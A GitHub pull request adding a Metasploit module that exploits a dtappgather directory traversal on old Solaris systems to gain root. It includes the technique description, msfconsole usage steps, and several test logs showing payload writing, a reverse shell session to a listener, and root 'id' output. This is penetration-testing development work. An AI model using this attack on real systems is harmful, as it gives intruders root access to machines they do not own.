Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module #10663

Merged
merged 3 commits into from Sep 23, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Sep 18, 2018

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module.

    This module exploits a directory traversal vulnerability in the
    `dtappgather` executable included with Common Desktop Environment (CDE)
    on unpatched Solaris systems prior to Solaris 10u11 which allows users
    to gain root privileges.

    dtappgather allows users to create a user-owned directory at any
    location on the filesystem using the `DTUSERSESSION` environment
    variable.

    This module creates a directory in `/usr/lib/locale`, writes a shared
    object to the directory, and runs the specified SUID binary with the
    shared object loaded using the `LC_TIME` environment variable.

    This module has been tested successfully on:

    Solaris 9u7 (09/04) (x86);
    Solaris 10u1 (01/06) (x86);
    Solaris 10u2 (06/06) (x86);
    Solaris 10u4 (08/07) (x86);
    Solaris 10u8 (10/09) (x86);

Verification

  • Start msfconsole
  • Get a session
  • use exploit/solaris/local/extremeparr_dtappgather_priv_esc
  • set SESSION [SESSION]
  • run
  • You should get a new root session

Output

msf5 > use exploit/solaris/local/extremeparr_dtappgather_priv_esc 
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1
session => 1
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196
lhost => 172.16.191.196
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.196:4444 
[+] Created directory /usr/lib/locale/ExDmW
[*] Writing '/tmp/.Wfy7WpcZej/.pv7h2R.c' (170 bytes) ...
[*] Writing '/tmp/.Wfy7WpcZej/.uGjK3nLc5' (175 bytes) ...
[*] Executing payload...
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R.c
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.2
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.3
[+] Deleted /tmp/.Wfy7WpcZej/.uGjK3nLc5
[+] Deleted /usr/lib/locale/ExDmW
[+] Deleted /tmp/.Wfy7WpcZej
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
cat /etc/release
                        Solaris 10 1/06 s10x_u1wos_19a X86
           Copyright 2005 Sun Microsystems, Inc.  All Rights Reserved.
                        Use is subject to license terms.
                           Assembled 07 December 2005
@h00die h00die mentioned this pull request Sep 18, 2018
5 of 9 tasks complete
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 21, 2018

Add 10u9 to the list.

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/PNjrx
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/PNjrx
[*] Creating directory '/tmp/.gfiAL'
[*] Writing '/tmp/.gfiAL/.Rh2z4O.c' (166 bytes) ...
[*] Max line length is 262145
[*] Writing 166 bytes in 1 chunks of 571 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/PNjrx
[*] Writing '/tmp/.gfiAL/.I4aGhLwn1y' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32797) at 2018-09-21 14:25:16 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.gfiAL/.Rh2z4O.c
[+] Deleted /tmp/.gfiAL/.Rh2z4O
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.2
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.3
[+] Deleted /tmp/.gfiAL/.I4aGhLwn1y
[+] Deleted /usr/lib/locale/PNjrx
[+] Deleted /tmp/.gfiAL

cat /etc/release
                    Oracle Solaris 10 9/10 s10x_u9wos_14a X86
@h00die h00die self-assigned this Sep 21, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 21, 2018

11.3 fails (as expected since its not vulnerable, and the payload would have failed anyways)

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 2.2.2.2:4444 
[-] /usr/dt/bin/dtappgather is not setuid
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 21, 2018

10u2

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/rpiRihd9
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/rpiRihd9
[*] Creating directory '/tmp/.4qKYd8wVkW'
[*] Writing '/tmp/.4qKYd8wVkW/.Jfbb7u.c' (170 bytes) ...
[*] Max line length is 262145
[*] Writing 170 bytes in 1 chunks of 586 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/rpiRihd9
[*] Writing '/tmp/.4qKYd8wVkW/.roWJo1POK' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32783) at 2018-09-21 15:02:37 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u.c
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.2
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.3
[+] Deleted /tmp/.4qKYd8wVkW/.roWJo1POK
[+] Deleted /usr/lib/locale/rpiRihd9
[+] Deleted /tmp/.4qKYd8wVkW

id
uid=0(root) gid=0(root)
^Z
Background session 2? [y/N]  y
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

id
uid=100(solaris) gid=1(other)

end

def exploit
if is_root?

This comment has been minimized.

Copy link
@h00die

h00die Sep 23, 2018

Contributor

Any reason this is here and not in check?
Knowing you, there was a thought process behind the decision, just curious for consistency in other modules.

This comment has been minimized.

Copy link
@h00die

h00die Sep 23, 2018

Contributor

if it were in check, it could be bypassed by the force exploit.
Not sure why someone would still want to run it while being root, but at least it leaves that option open

This comment has been minimized.

Copy link
@bcoles

bcoles Sep 23, 2018

Author Contributor

@h00die It's nice to be able to run the check method to determine whether a host is vulnerable, regardless of our current user context. The host is no more or less vulnerable if we're already root. If we're already root, the host isn't Safe.

There's a separate issue here, which is that there are instances where we'll want to execute the module, even if we are already root. In particular, the is_root? check is not namespace safe. It's quite possibly we'll have a session in a user namespace as root yet still want to execute the module to become real root UID 0.

I haven't had time to open an issue for discussion. My suggestion is to keep the is_root? check outside of the check method, while ensuring it is still included in a ForceExploit conditional in each module. However #10622 needs to be resolved before a code pattern can be developed and implemented in every local exploit module.

@h00die h00die merged commit 7687e6e into rapid7:master Sep 23, 2018
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
h00die added a commit that referenced this pull request Sep 23, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 23, 2018

Release Notes

The Solaris EXTREMEPARR dtappgather module has been added to the framework. It exploits a direct traversal vulnerability in the dtappgather executable that is included on unpatched Solaris systems 10u11 and older. You can achieve root access with this exploit.

@bcoles bcoles deleted the bcoles:extremeparr_dtappgather_priv_esc branch Sep 23, 2018
msjenkins-r7 added a commit that referenced this pull request Sep 24, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.